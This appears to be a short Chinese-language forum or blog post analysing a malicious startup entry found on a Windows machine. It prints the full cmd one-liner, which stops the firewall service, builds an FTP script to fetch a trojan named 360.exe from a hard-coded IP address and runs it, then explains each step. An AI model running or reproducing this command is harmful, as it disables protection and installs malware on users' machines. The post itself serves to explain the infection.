以下这段话被加入了开机启动,自动下载名为360.exe的木马并运行
"c:/windows/system32/cmd.exe" /c net1 stop sharedaccess &echo open 221.13.32.83 > cmd.txt&echo 123>> cmd.txt&echo 123>> cmd.txt&echo binary >> cmd.txt&echo get 360.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&360.exe&360.exe&del cmd.txt /q
大致步骤为:
1.关闭防火墙
2.生成一个cmd.txt文件,作为ftp的命令输入文件,这个文件内容如下:
open 221.13.32.83
123
123
binary
get 360.exe
bye
3.使用ftp进行下载
4.运行下载的360.exe